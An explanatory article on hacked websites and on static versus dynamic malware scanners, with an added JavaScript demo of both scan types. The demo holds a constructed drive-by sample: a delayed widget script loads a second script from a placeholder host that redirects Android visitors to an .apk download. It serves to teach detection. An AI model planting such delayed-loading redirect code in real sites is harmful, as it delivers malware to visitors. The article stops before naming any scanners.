Your website is hacked or infected

Sooner or later, a web developer, webmaster or any website owner who maintains a site can face security problems: the resource is sanctioned by a search engine or starts to be blocked by antivirus software, the hosting provider sends a notification that malicious code was detected, and visitors begin to complain about pop-up ads or redirects to dubious third-party sites. There are also many other symptoms of website infection that are important to know; we have described them in great detail here.

At this point, the task becomes finding the source of the problem, that is, diagnosing the site for security issues. With a competent approach, diagnostics consists of two stages:

Website antivirus scanner

The first and most important stage is to scan all files and databases located on the server. Ideally, you should install a quality virus scanner or antivirus on the site to detect malicious code. The antivirus checks the files and database on the hosting for server-side malicious scripts and injections.

Malware online scanning

If you do not have a professional malware scanner installed, you can run an express scan with any online service, but you will not get a full diagnosis. All online scanners examine only the external code of the pages and do not check your website's files on the hosting. Such a scanner checks the page code for virus injections and hidden redirects, nothing more. It is important to at least choose a scanner that performs not only static but also dynamic site scanning. The only advantage of a dynamic scanner is the rapid detection of redirects to malicious sites.

What are dynamic and static malware scanners

Static scanner functionality

Static analysis of pages is the search for malicious inserts (mostly JavaScript), spam links and spam content, phishing pages and other static elements on the checked page and in the connected files. Such fragments are detected using a signature database or a set of regular expressions. If the malicious code is constantly present on the page or in the downloaded files, and is also known to the web scanner (that is, it has been added to the signature database), the web scanner will detect it. But this does not always happen. For example, malicious code can be downloaded from another resource or perform unauthorized actions only under certain conditions:
• when the page is loaded, JavaScript is added to it that carries out a drive-by download attack;
• the user leaves the page, and at that moment code is loaded that opens a popunder with "adult" content;
• the visitor stays on the page for a few seconds and only then is redirected to a paid SMS subscription, and so on.

Dynamic scanner functionality

If it is not known in advance which code provokes these unauthorized actions, it is extremely difficult to detect it by static analysis. Fortunately, there is dynamic analysis, sometimes also called "behavioral" analysis. A smart web scanner will not just analyze the source code of the page or files, but will also try to perform some operations, emulating the actions of a real visitor. After each action or under certain conditions, the scanner robot analyzes the changes and accumulates data for the final report: it loads the page in several browsers (not just with different User-Agents, but with different values of the navigator object in JavaScript, different document.referrer values, etc.), accelerates the internal timer, catches redirects to external resources, and tracks what is passed to eval(), document.write(), etc.

An advanced web scanner will always check the page code and the objects on it both before any scripts execute (immediately after the page loads) and again after some time, because modern "malware" dynamically adds or hides objects through JavaScript and also performs background downloads inside dynamic frames. For example, the code of an infected widget can, after 3 seconds or after a mouse movement, load a script that inserts JavaScript into the page with a redirect to download a dangerous .apk file. Naturally, no static analysis (unless it is known in advance that the widget is dangerous) or file search will reveal this.
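An added example (not from the original article or from any scanner's code): a minimal JavaScript emulation of the static and dynamic passes described above, run on a constructed page whose widget loads a second script after 3 seconds. The placeholder domains, the `RESOURCES` map and all function names are assumptions for illustration; a real dynamic scanner drives an instrumented browser instead of stubs.

```javascript
// Constructed sample (placeholder domains): a page whose widget loads a second
// script after 3 seconds; that script redirects Android visitors to an .apk.
const PAGE = '<script src="https://widget.example.invalid/w.js"></script>';
const RESOURCES = {
  'https://widget.example.invalid/w.js': `setTimeout(function () {
    document.write('<script src="https://cdn.example.invalid/s2.js"></script>');
  }, 3000);`,
  'https://cdn.example.invalid/s2.js': `if (/Android/.test(navigator.userAgent)) {
    location.href = 'https://cdn.example.invalid/update.apk';
  }`,
};
const SIGNATURES = [/location\.href\s*=/, /\.apk\b/, /<iframe/i];
const SRC_RE = /<script[^>]+src="([^"]+)"/g;

// Static pass: signatures over the page source and the files it references directly.
function staticScan(html) {
  const linked = [...html.matchAll(SRC_RE)].map((m) => RESOURCES[m[1]] || '');
  return SIGNATURES.filter((sig) => [html, ...linked].some((t) => sig.test(t))).map(String);
}

// Dynamic pass: run the scripts against stubbed browser objects and log what they do.
// new Function is not an isolation boundary; feed it constructed samples only.
function dynamicScan(html, userAgent) {
  const events = [];
  const timers = [];
  const location = { set href(url) { events.push({ type: 'redirect', value: url }); } };
  const document = {
    referrer: 'https://www.google.com/', // constructed referrer value
    write(markup) { events.push({ type: 'document.write', value: markup }); load(markup); },
  };
  const run = (src) =>
    new Function('document', 'navigator', 'location', 'setTimeout', 'eval', src)(
      document, { userAgent }, location,
      (fn) => timers.push(fn), // queue the callback instead of waiting
      (code) => { events.push({ type: 'eval', value: code }); return run(code); });
  function load(markup) { // fetch and run every external script the markup references
    for (const m of markup.matchAll(SRC_RE)) {
      events.push({ type: 'script-load', value: m[1] });
      if (RESOURCES[m[1]]) run(RESOURCES[m[1]]);
    }
  }
  load(html);
  while (timers.length) timers.shift()(); // accelerated timer: fire queued callbacks now
  return events;
}
```

Running `dynamicScan(PAGE, ...)` once with a desktop User-Agent and once with an Android one shows why the scanner varies the navigator values: only the Android profile records the redirect, while `staticScan(PAGE)` matches nothing in either case.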

How to find the right scanner

And now, with an understanding of the requirements for diagnosing a site and for web scanners, let's try to find those that are really effective. Unfortunately, what appears on the first page of search results for the query "check the site for viruses online" is of little use. These are either amateur "crafts" that at best can perform a static page analysis (for example, find an IFRAME that may not even be dangerous), or third-party API aggregators that check the site URL using the Google Safe Browsing API, the Yandex Safe Browsing API or the VirusTotal API.

If you check the site with a desktop antivirus, the analysis will most likely also be static: the antivirus skilfully blocks downloads from infected sites known to it, but one should not expect any deep dynamic analysis of the site pages from it (although some antiviruses do indeed detect signatures in files and on the page).

In the end, after checking two dozen well-known services, I would like to dwell on the ones presented below.
